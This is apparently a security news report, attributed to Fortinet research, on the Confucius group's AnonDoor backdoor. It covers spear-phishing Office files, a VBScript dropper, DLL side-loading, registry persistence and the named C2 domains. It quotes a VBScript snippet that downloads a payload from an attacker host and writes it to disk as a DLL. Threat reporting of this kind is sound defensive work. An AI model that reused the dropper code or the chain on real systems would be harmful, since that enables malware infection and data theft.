The Confucius hacker group, active since 2013, has recently escalated its operations by weaponizing malicious Office documents to compromise Windows endpoints with a new Python-based backdoor, dubbed AnonDoor.
Historically known for deploying document stealers such as WooperStealer, the threat actor has now shifted to a sophisticated multi-stage infection chain that leverages OLE-embedded scripts, VBScript droppers, PowerShell loaders, and scheduled tasks to achieve persistence and evade detection.
This evolution underscores the group’s commitment to refining its tradecraft and targeting high-value information across government and defense organizations in South Asia.
Confucius’ activities (Source – Fortinet)
Initial access is most commonly achieved through spear-phishing campaigns that deliver corrupted PPSX or DOCX attachments.
When unsuspecting users open these documents, they encounter a “Corrupted Page” prompt that conceals an embedded OLE object.
This object triggers a background fetch of a secondary document, mango44NX.doc, from a remote server.
Fortinet researchers noted that the CMD stub within slide1.xml.rels initiates a VBScript dropper hosted at greenxeonsr.info, marking the first deployment of AnonDoor in this campaign.
Upon execution, the VBScript dropper performs the following steps: it creates an MSXML2.XMLHTTP object to download a raw DLL payload, writes the binary to %LocalAppData%Mapistub.dll, and then stages execution via DLL side-loading.
The dropper also copies a legitimate executable to %AppData%Swom.exe and writes a registry key under HKCUSoftwareMicrosoftWindowsCurrentVersionRun to ensure the side-loaded DLL is launched on each login.
Download DLL (Source – Fortinet)
This strategy not only conceals the malicious binary within trusted processes but also provides robust persistence without generating conspicuous artifacts.
Infection Mechanism
The infection mechanism centers on leveraging a malicious Office payload to seamlessly introduce AnonDoor.
First, the document’s OLE object references an external VBScript hosted on greenxeonsr.info.
The script snippet below illustrates how the dropper leverages ADODB.Stream to save the downloaded bytes as a DLL:-
Set objXMLHTTP = CreateObject(“MSXML2.XMLHTTP”)
objXMLHTTP.Open “GET”, “https://greenxeonsr.info/Jsdfwejhrg.rko”, False
objXMLHTTP.Send
Set objStream = CreateObject(“ADODB.Stream”)
objStream.Type = 1 ‘ Binary
objStream.Open
objStream.Write objXMLHTTP.responseBody
objStream.SaveToFile WScript.Network.UserName & “Mapistub.dll”, 2
objStream.Close
Once the DLL is in place, the dropper invokes a reconstructed ShellExecute call to launch Swom.exe, which side-loads the DLL into memory.
The DLL subsequently reaches out to multiple C2 domains—cornfieldblue.info and hauntedfishtree.info—to retrieve further payloads, including the WooperStealer module and additional configuration files.
This multi-layered approach ensures that even if one stage is detected, subsequent payloads can be dynamically fetched, analyzed, and replaced, complicating forensic investigations.
By chaining document-based exploitation with obfuscated scripting and DLL side-loading, Confucius demonstrates advanced operational security and resilience against endpoint defenses.
Defensive teams should prioritize monitoring for anomalous OLE object behaviour, unexpected registry modifications, and unusual DLL loads within Office processes.
Integrating heuristics that detect atypical stream writes to user directories and enforcing strict network segmentation can help mitigate this emerging threat.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
Source: cybersecuritynews.com
